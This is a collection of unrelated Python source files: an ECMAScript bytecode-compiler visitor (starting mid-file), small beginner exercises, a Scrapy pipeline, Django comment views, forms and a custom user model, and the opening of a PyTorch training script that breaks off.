ctx.children[4].accept(self) # deal with it
# Visit a parse tree produced by ECMAScriptParser#FunctionExpression.
def visitFunctionExpression(self, ctx):
dprint("visitFunctionExpression")
isLambda = False
if(isinstance(ctx.children[2], antlr4.tree.Tree.TerminalNodeImpl)
and isinstance(ctx.children[3], antlr4.tree.Tree.TerminalNodeImpl)):
# haz no parameters
if ctx.getChildCount() == 7:
# Normal function, so we have a name
self.add_instruction(OpCode.PUSH, []) # add an empty param
program = Code()
bytecode = BytecodeVisitor(program)
ctx.children[5].accept(bytecode) # save the bytecode of the body in the var bytecode
self.add_instruction(OpCode.PUSH, program)
self.add_instruction(OpCode.MAKE_FUNC)
functionName = ctx.children[1].accept(self)
elif ctx.getChildCount() == 6:
# Lambda function, return function only
# setup the function bits
isLambda = True
self.add_instruction(OpCode.PUSH, []) # add an empty param
program = Code()
bytecode = BytecodeVisitor(program)
ctx.children[4].accept(bytecode) # save the bytecode of the body in the var bytecode
self.add_instruction(OpCode.PUSH, program)
self.add_instruction(OpCode.MAKE_FUNC)
else: # haz parameters
if ctx.getChildCount() == 8:
# Normal function, so we have a name
ctx.children[3].accept(self) #add params to stack
program = Code()
bytecode = BytecodeVisitor(program)
ctx.children[6].accept(bytecode) # save the bytecode of the body in the var bytecode
self.add_instruction(OpCode.PUSH, program)
self.add_instruction(OpCode.MAKE_FUNC)
functionName = ctx.children[1].accept(self)
elif ctx.getChildCount() == 7:
# Lambda function, return function only
# setup the function bits
isLambda = True
ctx.children[2].accept(self) #add params to stack
program = Code()
bytecode = BytecodeVisitor(program)
ctx.children[5].accept(bytecode) # save the bytecode of the body in the var bytecode
self.add_instruction(OpCode.PUSH, program)
self.add_instruction(OpCode.MAKE_FUNC)
if not isLambda:
self.add_instruction(OpCode.STORE, functionName)
# Visit a parse tree produced by ECMAScriptParser#defaultClause.
def visitDefaultClause(self, ctx):
raise Utils.UnimplementedVisitorException(ctx)
# Visit a parse tree produced by ECMAScriptParser#ForStatement.
def visitForStatement(self, ctx):
dprint("visitForStatement")
print("For statement is broken due to while fix, U said only to fix while");
return;
# [0] = for, [1] = (, [2] = assignment/starting value, [3] = ;,
# [4] = end condition, [5] = ; , [6] = change of var or whatever
# [7] = ), [8] = block
# The above is if the for loop is full, it could be for (;;) {...}
# as well, so the code below is made to make sure it works no matter what
#var for checking if the for statement has an condition or not
noCondition = False
assignmentIndex = 2
# find assignment, if it exists
# if we have for(;;) for example this will simply not do anything
assignment = ctx.children[assignmentIndex].accept(self)
if assignment == "var":
assignmentIndex = assignmentIndex + 1 # = 3
assignment = ctx.children[assignmentIndex].accept(self)
conditionIndex = assignmentIndex + 2 # = 5
elif assignment == ";":
conditionIndex = assignmentIndex + 1; # = 3
else:
conditionIndex = assignmentIndex + 2; # = 4
#find condition, if it exists
if isinstance(ctx.children[conditionIndex], antlr4.tree.Tree.TerminalNodeImpl): #basically if = ;
noCondition = True #no condition was supplied, so we should always return True
incrementThingIndex = conditionIndex + 1
else:
#find increment thing, if it exists
incrementThingIndex = conditionIndex + 2
#find body
if isinstance(ctx.children[incrementThingIndex], antlr4.tree.Tree.TerminalNodeImpl):
bodyIndex = incrementThingIndex + 1
else:
bodyIndex = incrementThingIndex + 2
placeholderAddr = 1337
breakAddr = self.program.current_index()
self.add_instruction(OpCode.TRY_PUSH, placeholderAddr)
continueStart = self.program.current_index()
self.add_instruction(OpCode.TRY_PUSH, continueStart)
forStart = self.program.current_index()
if noCondition:
self.add_instruction(OpCode.PUSH, True)
else:
ctx.children[conditionIndex].accept(self) # True/False value pushed to stack
unlessJmpAddr = self.program.current_index()
self.add_instruction(OpCode.UNLESSJMP, placeholderAddr)
# code to run
ctx.children[bodyIndex].accept(self)
# Jump over try_push, try_push should only be reached from throw(continue)
self.add_instruction(OpCode.JMP, self.program.current_index()+2)
continueAddr = self.program.current_index()
self.add_instruction(OpCode.TRY_PUSH, continueAddr)
ctx.children[incrementThingIndex].accept(self)
#ctx.children[6].accept(self) # run the increment of var or whatever
self.add_instruction(OpCode.JMP, forStart)
exitForAddr = self.program.current_index()
self.program.modify_instruction_arg(unlessJmpAddr, exitForAddr)
self.program.modify_instruction_arg(breakAddr, exitForAddr)
self.program.modify_instruction_arg(continueStart, continueAddr)
# Visit a parse tree produced by ECMAScriptParser#caseBlock.
def visitCaseBlock(self, ctx):
dprint("visitCaseBlock")
# Should have placeholder that is replaced with address out of switch/case(to jump out)
placeholderAddr = 1337
defalutAddr = None
breakAddr = self.program.current_index()
self.add_instruction(OpCode.TRY_PUSH, placeholderAddr)
self.add_instruction(OpCode.TRY_PUSH, placeholderAddr) # dummy try_push beacuse break does pop first
#push placeholder jump-table
jumpTableAddr = self.program.current_index()
jumpTable = {}
self.add_instruction(OpCode.PUSH, {})
switchAddr = self.program.current_index()
self.add_instruction(OpCode.SWITCH, placeholderAddr)
for child in ctx.children:
if(not isinstance(child, antlr4.tree.Tree.TerminalNodeImpl)): # Skip "{ and }"
#VARNING, fulhack incoming
if(isinstance(child.children[1], antlr4.tree.Tree.TerminalNodeImpl)):
caseVal = child.children[1].symbol.text
else:
caseVal = child.children[1].children[0].children[0].children[0].children[0].symbol.text
if caseVal == ":": #Default
#There is a default case, save it in case we need it
defalutAddr = self.program.current_index()
child.children[2].accept(self)
else:
caseVal = int(caseVal) # Nothing to see, move on
#Add to jump table
jmpAddr = self.program.current_index()
jumpTable[caseVal] = jmpAddr
#code to run here
child.children[3].accept(self)
self.add_instruction(OpCode.TRY_POP)
self.add_instruction(OpCode.TRY_POP)
### Fix placeholder stuff (jump table, try_push)
self.program.modify_instruction_arg(jumpTableAddr, jumpTable)
exitSwitchAddr = self.program.current_index()
self.program.modify_instruction_arg(breakAddr, exitSwitchAddr)
if defalutAddr is None:
defalutAddr = exitSwitchAddr
self.program.modify_instruction_arg(switchAddr,defalutAddr)
# Visit a parse tree produced by ECMAScriptParser#objectLiteral.
def visitObjectLiteral(self, ctx):
dprint("visitObjectLiteral")
printCtx(ctx)
i = 0
for child in ctx.children:
if not isinstance(child, antlr4.tree.Tree.TerminalNodeImpl):
child.accept(self)
i = i + 1
self.add_instruction(OpCode.MAKE_OBJECT, i)
# Visit a parse tree produced by ECMAScriptParser#throwStatement.
def visitThrowStatement(self, ctx):
dprint("visitThrowStatement")
message = ctx.children[1].children[0].children[0].children[0].symbol.text
message = message[1:-1]
self.add_instruction(OpCode.PUSH, message)
self.add_instruction(OpCode.THROW)
# Visit a parse tree produced by ECMAScriptParser#breakStatement.
def visitBreakStatement(self, ctx):
dprint("visitBreakStatement")
tmpAddr = 6000
self.tmpStack.push(self.program.current_index())
self.add_instruction(OpCode.JMP, tmpAddr)
#self.add_instruction(OpCode.TRY_POP)
#self.add_instruction(OpCode.THROW)
# Visit a parse tree produced by ECMAScriptParser#ifStatement.
def visitIfStatement(self, ctx):
dprint("visitIfStatement")
ctx.children[2].accept(self) # True/False value pushed to stack
placeHolderIFPosition = self.program.current_index()
self.add_instruction(OpCode.UNLESSJMP, 1337)
ctx.children[4].accept(self)
#if we have an else statement we need to jump over it
if ctx.getChildCount() >= 7:
placeHolderELSEPosition = self.program.current_index()
self.add_instruction(OpCode.JMP, 1337)
#make sure the IFJUMP jumps over the if-true part of the statements
afterIF = self.program.current_index()
self.program.modify_instruction_arg(placeHolderIFPosition, afterIF)
if (ctx.getChildCount() >= 7):
ctx.children[6].accept(self)
#change the jump in the if-statement to jump over the else part
afterELSE = self.program.current_index()
self.program.modify_instruction_arg(placeHolderELSEPosition, afterELSE)
# Visit a parse tree produced by ECMAScriptParser#variableDeclaration.
def visitVariableDeclaration(self, ctx):
dprint("visitVariableDeclaration")
if (ctx.getChildCount() == 1):
varname = ctx.children[0].accept(self)
self.add_instruction(OpCode.DCL, varname)
else:
varname = ctx.children[0].accept(self)
ctx.children[1].accept(self)
self.add_instruction(OpCode.STORE, varname)
# Visit a parse tree produced by ECMAScriptParser#catchProduction.
def visitCatchProduction(self, ctx):
dprint("visitCatchProduction")
err = ctx.children[2].accept(self) # tha variable
#print("error variable is: ", err)
self.add_instruction(OpCode.STORE, err)
ctx.children[4].accept(self) # tha code to run
# Visit a parse tree produced by ECMAScriptParser#copntinueStatement.
def visitContinueStatement(self, ctx):
dprint("visitContinueStatement")
tmpAddr = 7000
self.tmpStack.push(self.program.current_index())
self.add_instruction(OpCode.JMP, tmpAddr)
# self.add_instruction(OpCode.THROW)
# Visit a parse tree produced by ECMAScriptParser#caseClause.
def visitCaseClause(self, ctx):
raise Utils.UnimplementedVisitorException(ctx)
def gen_setter(self, a, idx, b):
dprint("gen_setter, 3 args")
if(isinstance(a, list)):
a[int(idx)] = b
else:
if(isinstance(idx, float)):
idx = "__float__" + str(idx)
if(isinstance(b, Function)):
b = (a, b)
if(hasattr(a, idx)):
val = getattr(a, idx)
if(isinstance(val, Property)):
val.set(b)
else:
setattr(a, idx, b)
else:
setattr(a, idx, b)
def gen_getter(self, a, idx):
dprint("gen_getter, 2 args")
if(isinstance(a, list)):
if(idx == 'length'):
return float(len(a))
elif(idx == 'append'):
return lambda this, value: a.append(value)
return a[int(idx)]
else:
if(isinstance(idx, float)):
idx = "__float__" + str(idx)
val = getattr(a, idx)
if(isinstance(val, Property)):
return val.get()
else:
return val
def gen_setter_dot(self, a, idx):
dprint("gen_stter_dot")
a.accept(self)
self.add_instruction(OpCode.STORE_MEMBER, idx)
def gen_getter_dot(self, a, idx):
dprint("gen_getter_dot")
a.accept(self)
self.add_instruction(OpCode.LOAD_MEMBER, idx)
def gen_setter_indice(self, a, idx):
dprint("gen_setter_indice")
a.accept(self)
idx.accept(self)
self.add_instruction(OpCode.STORE_INDEX)
def gen_getter_indice(self, a, idx):
dprint("gen_getter_indice")
a.accept(self)
idx.accept(self)
self.add_instruction(OpCode.LOAD_INDEX)
def assignmentVariable(self, array, index, typ):
dprint("assignmentVariable")
if(typ == self.AV_IDENTIFIER):
variable_setter = lambda: self.add_instruction(OpCode.STORE, array[index].symbol.text)
variable_getter = lambda: self.add_instruction(OpCode.LOAD, array[index].symbol.text)
elif(typ == self.AV_MEMBERDOT):
variable_setter = lambda: self.gen_setter_dot(array[index], array[index + 2].accept(self))
variable_getter = lambda: self.gen_getter_dot(array[index], array[index + 2].accept(self))
elif(typ == self.AV_INDICE):
variable_setter = lambda: self.gen_setter_indice(array[index], array[index + 2])
variable_getter = lambda: self.gen_getter_indice(array[index], array[index + 2])
else:
raise Utils.UnimplementedVisitorException(array)
return (variable_setter, variable_getter)
# Visit a parse tree produced by ECMAScriptParser#PropertyExpressionAssignment.
def visitPropertyExpressionAssignment(self, ctx):
dprint("visitPropertyExpressionAssignment")
ctx.children[2].accept(self)
name = ctx.children[0].accept(self) #could be anything, but get and set are special
if(name != None):
self.add_instruction(OpCode.PUSH, name)
# Visit a parse tree produced by ECMAScriptParser#assignmentOperator.
def visitAssignmentOperator(self, ctx):
dprint("visitAssignmentOperator")
return ctx.children[0].symbol.text
# Visit a parse tree produced by ECMAScriptParser#eos.
def visitEos(self, ctx):
dprint("visitEos")
pass
# Visit a parse tree produced by ECMAScriptParser#program.
def visitProgram(self, ctx):
dprint("visitProgram")
args = []
for c in ctx.children:
if(not isinstance(c, antlr4.tree.Tree.TerminalNodeImpl)): # Skip ","
args.append(c.accept(self))
return args
# Visit a parse tree produced by ECMAScriptParser#argumentList.
def visitArgumentList(self, ctx):
dprint("visitArgumentList")
count = 0
for c in reversed(ctx.children): #we did reversed() here before to fix things, but it broke more things
if(not isinstance(c, antlr4.tree.Tree.TerminalNodeImpl)): # Skip ","
c.accept(self)
count += 1
return count
# Visit a parse tree produced by ECMAScriptParser#ThisExpression.
def visitThisExpression(self, ctx):
dprint("visitThisExpression")
self.add_instruction(OpCode.LOAD, "this")
# Visit a parse tree produced by ECMAScriptParser#identifierName.
def visitIdentifierName(self, ctx):
dprint("visitIdentifierName")
return ctx.children[0].accept(self)
# Visit a parse tree produced by ECMAScriptParser#BinaryExpression.
def visitBinaryExpression(self, ctx):
dprint("visitBinaryExpression")
op = ctx.children[1].accept(self)
if(op == '&&'):
placeholderAddr = 1337
ctx.children[0].accept(self)
if1 = self.program.current_index()
self.add_instruction(OpCode.UNLESSJMP, placeholderAddr) # if false
ctx.children[2].accept(self)
if2 = self.program.current_index()
self.add_instruction(OpCode.JMP, placeholderAddr+1) # if true
jump1 = self.program.current_index()
self.add_instruction(OpCode.PUSH, False)
self.program.modify_instruction_arg(if1, jump1)
self.program.modify_instruction_arg(if2, jump1+1)
return;
elif(op == '||'):
placeholderAddr = 1337
ctx.children[0].accept(self)
if1 = self.program.current_index()
self.add_instruction(OpCode.IFJMP, placeholderAddr) # if false
ctx.children[2].accept(self)
if2 = self.program.current_index()
self.add_instruction(OpCode.JMP, placeholderAddr+1) # if true
jump1 = self.program.current_index()
self.add_instruction(OpCode.PUSH, True)
self.program.modify_instruction_arg(if1, jump1)
self.program.modify_instruction_arg(if2, jump1+1)
return;
if(op == '+'):
ctx.children[2].accept(self)
ctx.children[0].accept(self)
else:
ctx.children[0].accept(self)
ctx.children[2].accept(self)
if(op == '+'):
self.add_instruction(OpCode.ADD)
elif(op == '-'):
self.add_instruction(OpCode.SUB)
elif(op == '*'):
self.add_instruction(OpCode.MUL)
elif(op == '/'):
self.add_instruction(OpCode.DIV)
elif(op == '%'):
self.add_instruction(OpCode.MOD)
elif(op == '<<'):
self.add_instruction(OpCode.LEFT_SHIFT)
elif(op == '>>'):
self.add_instruction(OpCode.RIGHT_SHIFT)
elif(op == '>>>'):
self.add_instruction(OpCode.UNSIGNED_RIGHT_SHIFT)
elif(op == '>'):
self.add_instruction(OpCode.SUPPERIOR)
elif(op == '>='):
self.add_instruction(OpCode.SUPPERIOR_EQUAL)
elif(op == '<'):
self.add_instruction(OpCode.INFERIOR)
elif(op == '<='):
self.add_instruction(OpCode.INFERIOR_EQUAL)
elif(op == '==' or op == '==='):
self.add_instruction(OpCode.EQUAL)
elif(op == '!=' or op == '!=='):
self.add_instruction(OpCode.DIFFERENT)
elif(op == '&'):
self.add_instruction(OpCode.AND)
elif(op == '|'):
self.add_instruction(OpCode.OR)
else:
raise Utils.UnknownOperator(op)
# Visit a parse tree produced by ECMAScriptParser#futureReservedWord.
def visitFutureReservedWord(self, ctx):
raise Utils.UnimplementedVisitorException(ctx)
# Visit a parse tree produced by ECMAScriptParser#initialiser.
def visitInitialiser(self, ctx):
dprint("visitInitialiser")
ctx.children[1].accept(self)
# Visit a parse tree produced by ECMAScriptParser#statementList.
def visitStatementList(self, ctx):
dprint("visitStatementList")
self.visitChildren(ctx)
# Visit a parse tree produced by ECMAScriptParser#PropertyGetter.
def visitPropertyGetter(self, ctx):
dprint("visitPropertyGetter")
printCtx(ctx)
func_code = Code()
bv = BytecodeVisitor(func_code)
ctx.children[5].accept(bv)
tmp = ObjectModule()
self.add_instruction(OpCode.PUSH, tmp)
self.add_instruction(OpCode.PUSH, [])
self.add_instruction(OpCode.PUSH, func_code)
self.add_instruction(OpCode.MAKE_FUNC)
self.add_instruction(OpCode.PUSH, ctx.children[1].accept(self))
self.add_instruction(OpCode.MAKE_GETTER)
self.add_instruction(OpCode.LOAD_MEMBER, ctx.children[1].accept(self), True) #extract the getter
self.add_instruction(OpCode.PUSH, ctx.children[1].accept(self)) #name again
# Visit a parse tree produced by ECMAScriptParser#block.
def visitBlock(self, ctx):
dprint("visitBlock")
self.visitChildren(ctx)
# Visit a parse tree produced by ECMAScriptParser#expressionStatement.
def visitExpressionStatement(self, ctx):
dprint("visitExpressionStatement")
self.visitChildren(ctx)
self.add_instruction(OpCode.POP, 1)
# Visit a parse tree produced by ECMAScriptParser#keyword.
def visitKeyword(self, ctx):
raise Utils.UnimplementedVisitorException(ctx)
# Visit a parse tree produced by ECMAScriptParser#numericLiteral.
def visitNumericLiteral(self, ctx):
txt = "visitNumericLiteral " + str(float(eval(ctx.children[0].symbol.text)))
dprint(txt)
self.add_instruction(OpCode.PUSH, float(eval(ctx.children[0].symbol.text)))
# Visit a parse tree produced by ECMAScriptParser#labelledStatement.
def visitLabelledStatement(self, ctx):
raise Utils.UnimplementedVisitorException(ctx)
# Visit a parse tree produced by ECMAScriptParser#PropertySetter.
def visitPropertySetter(self, ctx):
dprint("visitPropertySetter")
func_code = Code()
bv = BytecodeVisitor(func_code)
ctx.children[6].accept(bv)
tmp = ObjectModule()
self.add_instruction(OpCode.PUSH, tmp)
self.add_instruction(OpCode.PUSH, [ctx.children[3].accept(self)])
self.add_instruction(OpCode.PUSH, func_code)
self.add_instruction(OpCode.MAKE_FUNC)
self.add_instruction(OpCode.PUSH, ctx.children[1].accept(self)) #push name
self.add_instruction(OpCode.MAKE_SETTER)
self.add_instruction(OpCode.LOAD_MEMBER, ctx.children[1].accept(self), True) #extract the getter
self.add_instruction(OpCode.PUSH, ctx.children[1].accept(self)) #name again
# Visit a parse tree produced by ECMAScriptParser#LiteralExpression.
def visitLiteralExpression(self, ctx):
dprint("visitLiteralExpression")
self.visitChildren(ctx)
# Visit a parse tree produced by ECMAScriptParser#ArrayLiteralExpression.
def visitArrayLiteralExpression(self, ctx):
dprint("visitArrayLiteralExpression")
return ctx.children[0].accept(self)
# Visit a parse tree produced by ECMAScriptParser#withStatement.
def visitWithStatement(self, ctx):
raise Utils.UnimplementedVisitorException(ctx)
# Visit a parse tree produced by ECMAScriptParser#MemberIndexExpression.
def visitMemberIndexExpression(self, ctx):
# Should return a[1], a value from array
# a [ list ]
dprint("visitMemberIndexExpression")
ctx.children[0].accept(self) #get name and load it
ctx.children[2].accept(self) #put index on stack
dprint("visitMemberIndexExpression-still")
self.add_instruction(OpCode.LOAD_INDEX)
# Visit a parse tree produced by ECMAScriptParser#formalParameterList.
def visitFormalParameterList(self, ctx):
dprint("visitFormalParameterList")
args = []
for c in reversed(ctx.children):
#if(c.symbol.type == ECMAScriptParser.Lexer.Identifier): WHERE DID IDENTIFIER GO?
if not c.symbol.text == ",":
args.append(c.symbol.text)
self.add_instruction(OpCode.PUSH, args)
# Visit a parse tree produced by ECMAScriptParser#incrementOperator.
def visitIncrementOperator(self, ctx):
dprint("visitIncrementOperator")
return ctx.children[0].symbol.text
# Visit a parse tree produced by ECMAScriptParser#AssignmentOperatorExpression.
def visitAssignmentOperatorExpression(self, ctx):
dprint("visitAssignmentOperatorExpression")
if(len(ctx.children) == 3):
(variable_setter, variable_getter) = self.assignmentVariable(ctx.children, 0, self.AV_IDENTIFIER)
operator = ctx.children[1]
value = ctx.children[2]
elif(len(ctx.children) == 5):
(variable_setter, variable_getter) = self.assignmentVariable(ctx.children, 0, self.AV_MEMBERDOT)
operator = ctx.children[3]
value = ctx.children[4]
elif(len(ctx.children) == 6):
(variable_setter, variable_getter) = self.assignmentVariable(ctx.children, 0, self.AV_INDICE)
operator = ctx.children[4]
value = ctx.children[5]
else:
raise Utils.UnimplementedVisitorException(ctx)
operator = operator.accept(self)
value.accept(self)
if(operator == "="):
variable_setter()
elif(operator == "+="):
variable_getter()
self.add_instruction(OpCode.ADD)
variable_setter()
elif(operator == "-="):
variable_getter()
self.add_instruction(OpCode.SWAP)
self.add_instruction(OpCode.SUB)
variable_setter()
elif(operator == "*="):
variable_getter()
self.add_instruction(OpCode.MUL)
variable_setter()
elif(operator == "/="):
variable_getter()
self.add_instruction(OpCode.SWAP)
self.add_instruction(OpCode.DIV)
variable_setter()
else:
raise Utils.UnknownOperator(operator)
# Visit a parse tree produced by ECMAScriptParser#PostUnaryAssignmentExpression.
def visitPostUnaryAssignmentExpression(self, ctx):
dprint("visitPostUnaryAssignmentExpression")
if(len(ctx.children) == 2):
(variable_setter, variable_getter) = self.assignmentVariable(ctx.children, 0, self.AV_IDENTIFIER)
operator = ctx.children[1]
elif(len(ctx.children) == 4):
(variable_setter, variable_getter) = self.assignmentVariable(ctx.children, 0, self.AV_MEMBERDOT)
operator = ctx.children[3]
elif(len(ctx.children) == 5):
(variable_setter, variable_getter) = self.assignmentVariable(ctx.children, 0, self.AV_INDICE)
operator = ctx.children[4]
else:
raise Utils.UnimplementedVisitorException(ctx)
operator = operator.accept(self)
variable_getter()
self.add_instruction(OpCode.DUP)
self.add_instruction(OpCode.PUSH, 1)
if(operator == "++"):
self.add_instruction(OpCode.ADD)
elif(operator == "--"):
self.add_instruction(OpCode.SUB)
else:
raise Utils.UnimplementedVisitorException(ctx)
variable_setter()
self.add_instruction(OpCode.POP, 1)
# Visit a parse tree produced by ECMAScriptParser#TernaryExpression.
def visitTernaryExpression(self, ctx):
raise Utils.UnimplementedVisitorException(ctx)
# Visit a parse tree produced by ECMAScriptParser#debuggerStatement.
def visitDebuggerStatement(self, ctx):
raise Utils.UnimplementedVisitorException(ctx)
# Visit a parse tree produced by ECMAScriptParser#ObjectLiteralExpression.
def visitObjectLiteralExpression(self, ctx):
dprint("visitObjectLiteralExpression")
ctx.children[0].accept(self)
# Visit a parse tree produced by ECMAScriptParser#arrayLiteral.
def visitArrayLiteral(self, ctx):
dprint("visitArrayLiteral")
ctx.children[1].accept(self)
# Visit a parse tree produced by ECMAScriptParser#elision.
def visitElision(self, ctx):
raise Utils.UnimplementedVisitorException(ctx)
# Visit a parse tree produced by ECMAScriptParser#statements.
def visitStatements(self, ctx):
dprint("visitStatements")
self.visitChildren(ctx)
# Visit a parse tree produced by ECMAScriptParser#UnaryExpression.
def visitUnaryExpression(self, ctx):
dprint("visitUnaryExpression")
op = ctx.children[0].symbol.text
ctx.children[1].accept(self)
if(op == '-'):
self.add_instruction(OpCode.NEG)
elif(op == '+'):
pass
elif(op == '~'):
self.add_instruction(OpCode.TILDE)
elif(op == '!'):
self.add_instruction(OpCode.NOT)
else:
raise Utils.UnknownOperator(op)
# Visit a parse tree produced by ECMAScriptParser#expressionSequence.
def visitExpressionSequence(self, ctx):
dprint("visitExpressionSequence")
return self.visitChildren(ctx)
# Visit a parse tree produced by ECMAScriptParser#literal.
def visitLiteral(self, ctx):
dprint("visitLiteral")
child = ctx.children[0]
if(isinstance(child, antlr4.tree.Tree.TerminalNodeImpl)):
if(child.symbol.text == 'true'):
self.add_instruction(OpCode.PUSH, True)
elif(child.symbol.text == 'false'):
self.add_instruction(OpCode.PUSH, False)
else:
self.add_instruction(OpCode.PUSH, eval(child.symbol.text))
else:
child.accept(self)
# Visit a parse tree produced by ECMAScriptParser#variableStatement.
def visitVariableStatement(self, ctx):
dprint("visitVariableStatement")
self.visitChildren(ctx)
# Visit a parse tree produced by ECMAScriptParser#statement.
def visitStatement(self, ctx):
dprint("visitStatement")
self.visitChildren(ctx)
# Visit a parse tree produced by ECMAScriptParser#ParenthesizedExpression.
def visitParenthesizedExpression(self, ctx):
dprint("visitParenthesizedExpression")
ctx.children[1].accept(self)
# Visit a parse tree produced by ECMAScriptParser#reservedWord.
def visitReservedWord(self, ctx):
raise Utils.UnimplementedVisitorException(ctx)
# Visit a parse tree produced by ECMAScriptParser#finallyProduction.
def visitFinallyProduction(self, ctx):
dprint("visitFinallyProduction")
ctx.children[1].accept(self)
# Visit a parse tree produced by ECMAScriptParser#IdentifierExpression.
def visitIdentifierExpression(self, ctx):
dprint("visitIdentifierExpression")
self.add_instruction(OpCode.LOAD, ctx.children[0].accept(self))
# Visit a parse tree produced by ECMAScriptParser#propertyName.
def visitPropertyName(self, ctx):
dprint("visitPropertyName") #CHECK THIS OUT YO. Elemensts in 08/08 should not be a str but an ObjectModule
child = ctx.children[0]
if(isinstance(child, antlr4.tree.Tree.TerminalNodeImpl)):
if(child.symbol.type == ECMAScriptParser.Lexer.StringLiteral):
self.add_instruction(OpCode.PUSH, eval(child.symbol.text))
return
r = child.accept(self)
if(r != None):
self.add_instruction(OpCode.PUSH, r)
# Visit a parse tree produced by ECMAScriptParser#arguments.
def visitArguments(self, ctx):
dprint("visitArguments")
if(len(ctx.children) == 3):
return ctx.children[1].accept(self)
elif(len(ctx.children) == 2):
return 0
else:
raise Utils.UnimplementedVisitorException(ctx)
# Visit a parse tree produced by ECMAScriptParser#variableDeclarationList.
def visitVariableDeclarationList(self, ctx):
dprint("visitVariableDeclarationList")
self.visitChildren(ctx)
# Visit a parse tree produced by ECMAScriptParser#functionBody.
def visitFunctionBody(self, ctx):
dprint("visitFunctionBody")
ctx.children[0].accept(self)
# Visit a parse tree produced by ECMAScriptParser#eof.
def visitEof(self, ctx):
raise Utils.UnimplementedVisitorException(ctx)
# Visit a parse tree produced by ECMAScriptParser#UnaryAssignmentExpression.
def visitUnaryAssignmentExpression(self, ctx):
dprint("visitUnaryAssignmentExpression")
operator = ctx.children[0]
if(len(ctx.children) == 2):
(variable_setter, variable_getter) = self.assignmentVariable(ctx.children, 1, self.AV_IDENTIFIER)
elif(len(ctx.children) == 4):
(variable_setter, variable_getter) = self.assignmentVariable(ctx.children, 1, self.AV_MEMBERDOT)
elif(len(ctx.children) == 5):
(variable_setter, variable_getter) = self.assignmentVariable(ctx.children, 1, self.AV_INDICE)
else:
raise Utils.UnimplementedVisitorException(ctx)
operator = operator.accept(self)
variable_getter()
if(operator == "++"):
self.add_instruction(OpCode.PUSH, 1)
self.add_instruction(OpCode.ADD)
elif(operator == "--"):
self.add_instruction(OpCode.PUSH, 1)
self.add_instruction(OpCode.SUB)
else:
raise Utils.UnimplementedVisitorException(ctx)
variable_setter()
|
# 201016 Class Reading "Sequences: Lists, Strings, and Tuples"
# Small Exercises
# 2. Largest Number
# Create a list of numbers, print the largest of the numbers.
##declare list
nums = [30, 40, 50, 100]
##print sum
print(max(nums)) |
user_num1 = int(input("Input your ferst number pls: "))
user_num2 = int(input("Input your second number pls: "))
if user_num1 > user_num2:
print('Второе число',user_num2,"\n",'Первое число',user_num1)
else:
print('Первое число',user_num1,"\n",'Второе число',user_num2)
|
# -*- coding: utf-8 -*-
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html
import bleach
class BonniePipeline(object):
def strip_html(self, string):
return bleach.clean(string, strip=True, tags=[])
def strip_characters(self, string):
return " ".join(string.split())
def strip (self, string):
return self.strip_characters(self.strip_html(string))
def process_item(self, item, spider):
item['datetime'] = self.strip(item['datetime'])
item['description'] = self.strip(item['description'])
return item
|
from django.shortcuts import render
from django.shortcuts import render,get_object_or_404,redirect
from django.views.generic import TemplateView,CreateView,UpdateView,DeleteView,ListView,DetailView
from posts.models import Post
from django.contrib.auth.mixins import LoginRequiredMixin
from django.contrib.auth.decorators import login_required
from django.contrib.auth.views import LoginView,LogoutView
from django.urls import reverse_lazy
from .forms import CommentForm
from .models import Comment
# Create your views here.
def add_comment(request,pk):
post = get_object_or_404(Post,pk=pk)
if request.method=='POST':
form = CommentForm(request.POST)
if form.is_valid:
comment = form.save(commit = False)
comment.post = post
comment.save()
return redirect('post:single',pk=post.pk,username = post.user)
else:
form = CommentForm
return render(request,'posts/_post.html',context = {'form':form})
# class CommentCreateView(CreateView):
# model = Comment
# template_name = "posts/_post.html"
# form_class = CommentForm
# @login_required
# def comment_approve(request,pk):
# comment = get_object_or_404(Comment,pk=pk)
# comment.approve()
# return redirect('blog_app:post_detail',pk=comment.post.pk)
@login_required
def delete_comment(request,pk):
comment = get_object_or_404(Comment,pk=pk)
post_pk = comment.post.pk
comment.delete()
return redirect('post:single',pk =post_pk)
# @login_required
# def publish_post(request,pk):
# post = get_object_or_404(Post,pk=pk)
# post.publish()
# return redirect('blog_app:post_detail',pk=pk) |
from django.forms import ModelForm
from django.contrib.auth.forms import UserCreationForm
from django import forms
from django.contrib.auth.models import User
class CouponApplyForm(forms.Form):
code = forms.CharField()
|
from django.contrib.auth.base_user import AbstractBaseUser, BaseUserManager
from django.contrib.auth.models import PermissionsMixin
from django.db import models
from django.db.models.signals import post_save
from django.dispatch import receiver
from rest_framework.authtoken.models import Token
from core import settings
class UserManager(BaseUserManager):
"""Модель Админа"""
def create_user(self, phone_number, email=None, password=None):
if not phone_number:
raise ValueError("Users must have a Phone number")
email = UserManager.normalize_email(email)
user = self.model(phone_number=phone_number, email=email,
is_staff=False, is_active=True, is_superuser=False, )
user.set_password(password)
user.save(using=self._db)
return user
def create_superuser(self, phone_number, password):
user = self.create_user(
phone_number,
password=password,
)
user.is_staff = True
user.is_superuser = True
user.save(using=self._db)
return user
class User(AbstractBaseUser, PermissionsMixin):
"""Модель Пользователей"""
first_name = models.CharField(verbose_name='Имя, Фамилия', max_length=255)
email = models.EmailField(verbose_name='Почта', max_length=60,)
date_joined = models.DateTimeField(verbose_name='Дата/время регистрации',
auto_now_add=True)
phone_number = models.SmallIntegerField(verbose_name='Номер телефона', unique=True,
default=0)
last_login = models.DateTimeField(verbose_name='Последний вход',
auto_now=True)
action = models.CharField(verbose_name='Аукционов сыграно', max_length=255, blank=True)
action_wins = models.CharField(verbose_name='Аукционов выйграно', max_length=255, blank=True)
check_accepted = models.BooleanField(verbose_name='Подтверждение регистрации', default=False)
is_active = models.BooleanField(default=True)
is_staff = models.BooleanField(default=False)
is_superuser = models.BooleanField(default=False)
USERNAME_FIELD = 'phone_number'
REQUIRED_FIELDS = []
objects = UserManager()
class Meta:
verbose_name = 'Пользователь'
verbose_name_plural = 'Пользователи'
def __str__(self):
return self.first_name
@receiver(post_save, sender=settings.AUTH_USER_MODEL)
def create_auth_token(sender, instance=None, created=False, **kwargs):
if created:
Token.objects.create(user=instance) |
# -*- coding: utf-8 -*-
from __future__ import print_function, division
import os
import time
import argparse
import torch
import torch.nn as nn
import torch.optim as optim
from torch.optim import lr_scheduler
from torch.autograd import Variable
from torchvision import datasets, transforms
from model import PCBModel
from test import test
import utils
# ---------------------- Settings ----------------------
parser = argparse.ArgumentParser(description='Training arguments')
parser.add_argument('--save_path', type=str, default='./model')
